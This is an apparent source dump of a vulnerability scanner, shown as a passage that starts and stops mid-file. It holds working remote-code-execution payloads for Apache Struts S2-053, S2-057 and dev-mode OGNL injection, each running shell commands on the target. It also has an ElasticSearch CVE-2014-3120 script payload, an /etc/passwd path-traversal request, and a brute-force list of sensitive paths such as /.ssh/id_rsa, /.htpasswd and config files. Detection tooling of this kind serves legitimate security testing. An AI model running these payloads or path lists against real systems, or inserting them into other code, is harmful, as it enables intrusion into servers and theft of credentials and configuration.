15 | from urllib.parse import quote
16 |
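def s2_053(url):
    """Check *url* for Struts S2-053 (Freemarker/OGNL injection via ``name``).

    The expression is assembled from fixed fragments, percent-encoded with
    ``urllib.parse.quote`` and sent as ``<url>/?name=<payload>``. It runs
    ``ps`` (through ``cmd.exe /c`` or ``/bin/bash -c`` depending on the server
    OS) and ``PID`` in the body is the success signal.

    Args:
        url: Target base URL; ``/?name=`` is appended to it.

    Returns:
        None; the verdict is printed.
    """
    cmd = 'ps'
    parts = [
        "%{(#_='multipart/form-data').",
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).",
        "(#_memberAccess?(#_memberAccess=#dm):",
        "((#container=#context['com.opensymphony.xwork2.ActionContext.container']).",
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).",
        "(#ognlUtil.getExcludedPackageNames().clear()).",
        "(#ognlUtil.getExcludedClasses().clear()).",
        "(#context.setMemberAccess(#dm)))).",
        "(#cmd='%s')." % cmd,
        "(#iswin=(@java.lang.System@getProperty('os.name').",
        "toLowerCase().contains('win'))).",
        "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).",
        "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).",
        "(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream(),'UTF-8'))}",
    ]
    payload = quote("".join(parts))
    try:
        # timeout added for consistency with the sibling checks; the original
        # call had none and could block the whole scan on a silent host.
        resp = requests.get('{}/?name={}'.format(url, payload), timeout=10)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在S2-053漏洞~" + Vcolors.ENDC)
        return
    if "PID" in resp.text:
        print(Vcolors.RED + "存在S2-053漏洞~" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在S2-053漏洞~" + Vcolors.ENDC)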
--------------------------------------------------------------------------------
/app2/s2_057.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_057.py
4 | @Time : 2019/08/03 22:03:03
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from urllib.parse import urlparse
14 | import argparse
15 | import sys
16 | from lib import *
17 |
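def s2_057(url):
    """Check *url* for Struts S2-057 (OGNL in a namespace / action chain).

    The target is rebuilt as ``<scheme>://<netloc>/<payload><path>`` where the
    percent-encoded payload is a namespace segment ending in
    ``/actionChain1.action``; redirects are not followed. ``PID`` in the body
    (output of the ``ps`` the expression runs) is the success signal.

    Args:
        url: Target URL, e.g. ``http://host[:port]/path``.

    Returns:
        None; the verdict is printed.
    """
    try:
        parts = urlparse(url)
        # ``netloc`` already holds ``host`` or ``host:port`` verbatim. The
        # original rebuilt it from ``url.port``, which is None when no port is
        # given and produced a ``host:None/`` base URL.
        newurl = parts.scheme + '://' + parts.netloc + '/'
        payload = "%24%7B%0A%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ps%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action"
        target = newurl + payload + parts.path
        # timeout added for consistency with the sibling checks; the original
        # call had none and could block the whole scan on a silent host.
        res = requests.get(target, allow_redirects=False, timeout=10)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在S2-057漏洞~" + Vcolors.ENDC)
        return
    if 'PID' in res.text:
        print(Vcolors.RED + "存在S2-057漏洞~" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在S2-057漏洞~" + Vcolors.ENDC)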
--------------------------------------------------------------------------------
/app2/s2_dev.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_dev.py
4 | @Time : 2019/08/03 22:10:40
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import requests
14 | from lib import *
15 | import sys
16 |
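def s2_dev(url):
    """Check *url* for the Struts dev-mode ``debug=browser`` OGNL evaluation.

    The query string in ``exp`` is appended to *url* and fetched with GET; the
    expression reads its command from ``command=ps`` and ``PID`` in the body
    is the success signal.

    Args:
        url: Target URL; ``exp`` is appended to it unchanged.

    Returns:
        None; the verdict is printed.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=ps'''
    target = url + exp
    try:
        resp = requests.get(target, headers=headers, timeout=10)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在S2-dev漏洞~" + Vcolors.ENDC)
        return
    if "PID" in resp.text:
        print(Vcolors.RED + "存在S2-dev漏洞~" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在S2-dev漏洞~" + Vcolors.ENDC)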
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : __init__.py
4 | @Time : 2019/08/02 10:45:15
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | #模块引用界面
12 |
13 | from lib.color import Vcolors
--------------------------------------------------------------------------------
/lib/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/lib/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/lib/__pycache__/color.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/lib/__pycache__/color.cpython-37.pyc
--------------------------------------------------------------------------------
/lib/color.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : color.py
4 | @Time : 2019/07/05 14:20:03
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
class Vcolors:
    """ANSI escape sequences used to colour the scanner's terminal output.

    Every attribute is the raw escape string. Callers put one of the colour
    codes in front of a message and ``ENDC`` after it to reset the terminal.
    """

    # Plain foreground colours.
    HEADER = "\033[95m"
    OKBLUE = "\033[94m"
    OKGREEN = "\033[92m"
    WARNING = "\033[93m"
    FAIL = "\033[91m"
    RED = "\033[31m"

    # Reset and text attributes.
    ENDC = "\033[0m"
    BOLD = "\033[1m"
    UNDERLINE = "\033[4m"

    # Attribute + colour combinations.
    YELLOW = "\033[1;33m"
    DARKGRAY = "\033[1;30m"
    CYAN = "\033[0;36m"
    PURPLE = "\033[0;35m"
    BROWN = "\033[0;33m"
    WHITE = "\033[1;37m"
27 |
--------------------------------------------------------------------------------
/poc/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : __init__.py
4 | @Time : 2019/08/02 10:34:57
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 | #POC检测脚本模块统一存储
11 |
12 | from poc.svn import svnCheck
13 | from poc.git import gitCheck
14 | from poc.dsstore import dsCheck
15 | from poc.weblogic import weblogicScan
16 | from poc.thinkphprce import thinkphp
17 | from poc.httpOptions import options
18 | from poc.redis import redisCheck
19 | from poc.corscheck import corsCheck
20 | from poc.httpsys import httpsys
21 | from poc.tomcatexample import tomcatCheck
22 | from poc.dirburte import dirburte
23 | from poc.portscan import portScan
24 | from poc.hostinject import hostinject
25 | from poc.esunauto import elasticsearch
26 | from poc.elasticSearch import esCheck
27 | from poc.struts2 import StrutsCheck
28 | from poc.jenkinsunauto import jenkins
29 | from poc.dockerunauto import dockercheck
30 | from poc.solrunautho import apachesolr
31 | from poc.rsyncunauth import rsyncheck
--------------------------------------------------------------------------------
/poc/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/corscheck.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/corscheck.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/dirburte.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/dirburte.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/dockerunauto.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/dockerunauto.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/dsstore.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/dsstore.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/elasticSearch.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/elasticSearch.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/esunauto.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/esunauto.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/git.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/git.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/hostinject.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/hostinject.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/httpOptions.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/httpOptions.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/httpsys.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/httpsys.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/jenkinsunauto.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/jenkinsunauto.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/portscan.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/portscan.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/redis.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/redis.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/rsyncunauth.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/rsyncunauth.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/solrunautho.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/solrunautho.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/struts2.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/struts2.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/svn.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/svn.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/thinkphprce.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/thinkphprce.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/tomcatexample.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/tomcatexample.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/__pycache__/weblogic.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/poc/__pycache__/weblogic.cpython-37.pyc
--------------------------------------------------------------------------------
/poc/corscheck.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : corscheck.py
4 | @Time : 2019/07/06 22:42:55
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 | import requests
11 | from lib import *
12 |
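def corsCheck(url):
    """Test whether *url* reflects a foreign ``Origin`` with credentials allowed.

    A GET is sent with ``Origin: www.je2se.com``; a finding is reported only
    when the response echoes exactly that value in
    ``Access-Control-Allow-Origin`` *and* sets
    ``Access-Control-Allow-Credentials: true`` — the pairing that lets another
    site read authenticated responses. The Origin value carries no scheme, so a
    server that only reflects well-formed origins will not be flagged (a
    possible false negative worth keeping in mind when reading a green result).

    Args:
        url: Target URL; redirects are not followed.

    Returns:
        None; the verdict is printed.
    """
    try:
        print('\n')
        print(Vcolors.OKBLUE + "正在对目标url进行CORS跨域资源共享漏洞探测~~" + Vcolors.ENDC)
        orgin = 'www.je2se.com'
        headers = {
            'Origin': orgin,
            'Cache-Control': 'no-cache',
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
        }
        r = requests.get(url, headers=headers, timeout=10, allow_redirects=False)
        # ``.get`` instead of indexing: an absent header is the ordinary
        # "not vulnerable" outcome, not a KeyError to be caught below.
        reflected = r.headers.get('Access-Control-Allow-Origin') == orgin
        with_credentials = r.headers.get('Access-Control-Allow-Credentials') == "true"
        if reflected and with_credentials:
            print(Vcolors.RED + "存在CORS跨域资源共享漏洞" + Vcolors.ENDC)
        else:
            print(Vcolors.OKGREEN + "不存在CORS跨域资源共享漏洞" + Vcolors.ENDC)
    except Exception:
        # Transport errors are reported as "not vulnerable", as before.
        print(Vcolors.OKGREEN + "不存在CORS跨域资源共享漏洞" + Vcolors.ENDC)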
33 |
--------------------------------------------------------------------------------
/poc/dirburte.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : dirburte.py
4 | @Time : 2019/07/07 00:19:28
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | from socket import *
15 | import threading
16 |
17 | threads = []
18 |
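def dirburte1(url2, path):
    """Request ``url2 + path`` and print it if the server answers 200 or 302.

    Runs in a worker thread (one per candidate path, see dirl). A 302 counts
    as a hit, so a site that redirects every unknown path to a login page will
    report every candidate — read the list with that in mind.

    Args:
        url2: URL prefix.
        path: Candidate path, expected to begin with ``/``.

    Returns:
        None; hits are printed, misses are silent.
    """
    s = url2 + path
    try:
        # No explicit timeout here; dirl() sets the socket default timeout
        # before starting the workers, which is what bounds this call.
        r = requests.get(s)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        # Any request failure is reported as a suspected WAF block, as before.
        print(Vcolors.YELLOW + "疑似存在防火墙,链接已被拦截" + Vcolors.ENDC)
        return
    if r.status_code in (200, 302):
        print(Vcolors.RED + "发现风险目录/文件,地址为:" + s + Vcolors.ENDC)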
30 |
def dirburte(ip):
    """Print the banner for the directory/file exposure scan and run dirl().

    Args:
        ip: Despite the name, a URL prefix — dirl() hands it to dirburte1,
            which appends each candidate path to it.
    """
    banner = (
        '\n',
        Vcolors.OKBLUE + "正在对目标url进行目录/文件泄露探测~~" + Vcolors.ENDC,
        Vcolors.YELLOW + "检测中,请稍候~~" + Vcolors.ENDC,
    )
    for line in banner:
        print(line)
    dirl(ip)
36 |
def dirl(ip):
    """Request every path in ``exp`` under *ip*, one thread per path.

    Args:
        ip: URL prefix; passed unchanged to dirburte1 together with each path.

    Side effects: sets the process-wide socket default timeout to 1 second
    (this also affects sockets opened elsewhere afterwards) and appends every
    started thread to the module-global ``threads`` list, which is never
    cleared — a second call re-joins the first call's finished threads too.
    """
    # setdefaulttimeout comes from ``from socket import *`` at module level.
    setdefaulttimeout(1)
    # Candidate paths for exposed files and admin interfaces. (The original
    # comment here read "scan ports 1-1024", which was stale — nothing in this
    # function touches ports.) The list contains a few duplicates, e.g.
    # "/.mysql_history" and "/config/database.yml", which are simply requested twice.
    exp = ["/robots.txt", "/README.md", "/crossdomain.xml",
        "/.hg","/CVS/Root", "/CVS/Entries", "/.idea/workspace.xml",
        "/nginx_status", "/.mysql_history", "/login/", "/phpMyAdmin",
        "/pma/", "/pmd/", "/SiteServer", "/admin/", "/Admin/", "/manage",
        "/manager/", "/manage/html", "/resin-admin", "/resin-doc",
        "/axis2-admin", "/admin-console", "/system", "/wp-admin",
        "/uc_server", "/debug", "/Conf", "/webmail", "/service",
        "/memadmin", "/owa", "/harbor", "/master", "/root", "/xmlrpc.php",
        "/phpinfo.php", "/zabbix", "/api", "/backup", "/inc",
        "/web.config", "/httpd.conf", "/local.conf", "/sitemap.xml",
        "/app.config", "/.bash_history", "/.rediscli_history", "/.bashrc",
        "/.history", "/nohup.out", "/.mysql_history", "/server-status",
        "/solr/", "/examples/","/examples/servlets/servlet/SessionExample", "/manager/html",
        "/login.do", "/config/database.yml", "/database.yml", "/db.conf",
        "/db.ini", "/jmx-console/HtmlAdaptor", "/cacti/",
        "/jenkins/script", "/memadmin/index.php", "/pma/index.php",
        "/phpMyAdmin/index.php", "/.git/HEAD", "/.gitignore",
        "/.ssh/known_hosts", "/.ssh/id_rsa", "/id_rsa",
        "/.ssh/authorized_keys", "/app.cfg", "/.mysql.php.swp",
        "/.db.php.swp", "/.database.php.swp", "/.settings.php.swp",
        "/.config.php.swp", "/config/.config.php.swp","/html.rar",
        "/.config.inc.php.swp", "/config.inc.php.bak", "/php.ini","/pwd.rar",
        "/sftp-config.json", "/WEB-INF/web.xml","/www.rar","/www.zip","/www.tar.gz",
        "/WEB-INF/web.xml.bak", "/WEB-INF/config.xml",
        "/WEB-INF/struts-config.xml", "/server.xml","/1.rar","/1.zip","/modules/ssl.zip","/www.war","/shell.war","/1.war",
        "/config/database.yml", "/WEB-INF/database.properties",
        "/WEB-INF/log4j.properties", "/WEB-INF/config/dbconfig",
        "/fckeditor/_samples/default.html", "/ckeditor/samples/",
        "/ueditor/ueditor.config.js",
        "/javax.faces.resource...%2fWEB-INF/web.xml.jsf", "/wp-config.php",
        "/configuration.php", "/sites/default/settings.php", "/config.php",
        "/config.inc.php", "/data/config.php", "/data/config.inc.php",
        "/data/common.inc.php", "/include/config.inc.php",
        "/WEB-INF/classes/", "/WEB-INF/lib/", "/WEB-INF/src/", "/.bzr",
        "/SearchPublicRegistries.jsp", "/.bash_logout",
        "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile",
        "/test2.html", "/conf.ini", "/index.tar.tz", "/index.cgi.bak",
        "/WEB-INF/classes/struts.xml", "/package.rar",
        "/WEB-INF/applicationContext.xml", "/mysql.php", "/apc.php",
        "/zabbix/", "/script", "/editor/ckeditor/samples/", "/upfile.php",
        "/conf.tar.gz",
        "/WEB-INF/classes/conf/spring/applicationContext-datasource.xml",
        "/output.tar.gz", "/.vimrc", "/INSTALL.TXT", "/pool.sh",
        "/database.sql.gz", "/o.tar.gz", "/upload.sh",
        "/WEB-INF/classes/dataBase.properties", "/b.php", "/setup.sh",
        "/db.php.bak", "/WEB-INF/classes/conf/jdbc.properties",
        "/WEB-INF/spring.xml", "/.htaccess",
        "/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp",
        "/.htpasswd", "/id_dsa", "/WEB-INF/conf/activemq.xml",
        "/config/config.php", "/.idea/modules.xml",
        "/WEB-INF/spring-cfg/applicationContext.xml", "/test2.txt",
        "/WEB-INF/classes/applicationContext.xml",
        "/WEB-INF/conf/database_config.properties",
        "/WEB-INF/classes/rabbitmq.xml",
        "/ckeditor/samples/sample_posteddata.php", "/proxy.pac",
        "/sql.php", "/test2.php", "/build.tar.gz",
        "/WEB-INF/classes/config/applicationContext.xml",
        "/WEB-INF/dwr.xml", "/readme", "/phpmyadmin/index.php",
        "/WEB-INF/web.properties", "/readme.html", "/key"]
    # One thread per path, all started at once — there is no concurrency cap,
    # so the target sees the whole list in a burst.
    for p in exp:
        t = threading.Thread(target=dirburte1,args=(ip,p))
        threads.append(t)
        t.start()

    # Wait for every thread ever registered, not only this call's.
    for t in threads:
        t.join()
106 |
--------------------------------------------------------------------------------
/poc/dockerunauto.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : docker_unauthorized_access.py
4 | @Time : 2019/08/03 23:03:54
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import socket
13 | from lib import *
14 |
15 |
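def dockercheck(ip):
    """Probe ``ip:2375`` for a Docker API that answers without authentication.

    A raw HTTP/1.1 ``GET /containers/json`` is written to a plain TCP socket;
    the host is flagged only when the first 1024 bytes of the reply contain a
    ``HTTP/1.1 200 OK`` status line plus the ``Docker`` and ``Api-Version``
    markers.

    Args:
        ip: Host name or IP address; the port is fixed at 2375.

    Side effects: sets the process-wide socket default timeout to 2 seconds
    (kept from the original; it also affects sockets opened afterwards).

    Returns:
        None; the verdict is printed.
    """
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行Docker未授权访问漏洞探测~~" + Vcolors.ENDC)
    socket.setdefaulttimeout(2)
    port = 2375
    payload = "GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" % (ip, port)
    try:
        # The context manager closes the socket on every path; the original
        # never closed it and leaked one descriptor per call.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((ip, port))
            # sendall() retries partial writes, which send() does not.
            s.sendall(payload.encode())
            recv = s.recv(1024)
    except Exception:
        # Connection refused / timeout land here. Narrowed from a bare
        # ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在Docker未授权访问漏洞" + Vcolors.ENDC)
        return
    if b"HTTP/1.1 200 OK" in recv and b'Docker' in recv and b'Api-Version' in recv:
        print(Vcolors.RED + "存在Docker未授权访问漏洞" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在Docker未授权访问漏洞" + Vcolors.ENDC)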
32 |
--------------------------------------------------------------------------------
/poc/dsstore.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : dsstore.py
4 | @Time : 2019/07/06 00:52:56
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | import re
13 | from lib import *
14 |
15 |
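def dsCheck(url2):
    """Look for an exposed ``.DS_Store`` at each directory level above *url2*.

    ``url2.count('/') - 2`` times (once per ``/`` beyond the scheme's ``//``),
    the last path segment is stripped and ``/.DS_Store`` is requested at the
    resulting prefix. The deepest candidate is therefore the parent of the
    URL's final segment, and a URL with no path at all (``scheme://host``)
    yields no candidates — both kept from the original.

    Args:
        url2: Target URL.

    Returns:
        None; one line is printed per candidate, or one warning if any
        request fails.
    """
    print('\n')
    print(Vcolors.OKBLUE + "正在对目标url进行.DS_Store漏洞探测~~" + Vcolors.ENDC)
    try:
        default_url = "/.DS_Store"
        candidates = []
        # Same count the original obtained by copying the URL char by char
        # into a list and calling list.count('/').
        depth = url2.count('/')
        for _ in range(depth - 2):
            url2 = url2[:url2.rfind("/")]
            candidates.append(url2 + default_url)
        for url in candidates:
            # timeout added: the original could hang indefinitely per candidate.
            r = requests.get(url, timeout=10)
            if r.status_code == 200:
                print(Vcolors.RED + "存在.DS_Store泄露漏洞,漏洞地址为:" + url + Vcolors.ENDC)
            else:
                print(Vcolors.OKGREEN + "不存在.DS_Store泄露漏洞" + Vcolors.ENDC)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.YELLOW + "疑似存在防火墙,链接已被拦截" + Vcolors.ENDC)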
--------------------------------------------------------------------------------
/poc/elasticSearch.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : elasticSearch.py
4 | @Time : 2019/07/19 17:29:45
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import requests
12 | import json
13 | from lib import *
14 |
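def dirTravlesal(url):
    """ElasticSearch path-traversal check through the ``_plugin/head`` route.

    Requests ``<url>:9200/_plugin/head/../../../../../../../../../etc/passwd``
    and treats any HTTP 200 as a hit; the response body is not inspected, so
    a plugin that serves a 200 for unknown paths would be a false positive.

    Args:
        url: Scheme and host without a port (``:9200`` is appended).

    Returns:
        None; the verdict is printed.
    """
    try:
        req = requests.get(url + ':9200/_plugin/head/../../../../../../../../../etc/passwd', timeout=5)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan;
        # a failed request is still reported as "not vulnerable".
        print(Vcolors.OKGREEN + "不存在ElasticSearch目录遍历漏洞" + Vcolors.ENDC)
        return
    if req.status_code == 200:
        print(Vcolors.RED + "存在ElasticSearch目录遍历漏洞" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在ElasticSearch目录遍历漏洞" + Vcolors.ENDC)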
24 |
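def remoteCodeExe(url):
    """CVE-2014-3120 check: script execution through ``script_fields``.

    First POSTs a throw-away document to the target's ``website/blog`` index
    so that the search has at least one hit (this *writes* to the target;
    keep it in mind when scoping a scan), then issues a ``_search`` whose
    ``script_fields`` entry runs ``whoami``. An HTTP 200 on the search is the
    only signal used — the body is not examined, so a server that accepts the
    query but ignores the script still counts as a hit.

    Args:
        url: Scheme and host without a port (``:9200`` is appended).

    Returns:
        None; the verdict is printed.
    """
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = {
        "size": 1,
        "query": {
            "filtered": {
                "query": {
                    "match_all": {
                    }
                }
            }
        },
        "script_fields": {
            "command": {
                "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
            }
        }
    }
    try:
        # Seed document; its response is not used.
        requests.post(url + ':9200/website/blog/', headers=headers, data="""{"name":"test"}""", timeout=5)
        req = requests.post(url + ':9200/_search?pretty', headers=headers, data=json.dumps(data), timeout=5)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在CVE-2014-3120 ElasticSearch远程命令执行" + Vcolors.ENDC)
        return
    # ENDC appended on every branch: the original omitted it here and left the
    # terminal coloured after the message, unlike the sibling checks.
    if req.status_code == 200:
        print(Vcolors.RED + "存在CVE-2014-3120 ElasticSearch远程命令执行" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在CVE-2014-3120 ElasticSearch远程命令执行" + Vcolors.ENDC)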
54 |
def remoteCodeExe1(url): # CVE-2015-1427
    """Probe for CVE-2015-1427 (Groovy script execution through ``script_fields``).

    Like remoteCodeExe(), this writes a document into ``website/blog`` first
    and then submits a search whose ``script_fields`` entry executes ``id``
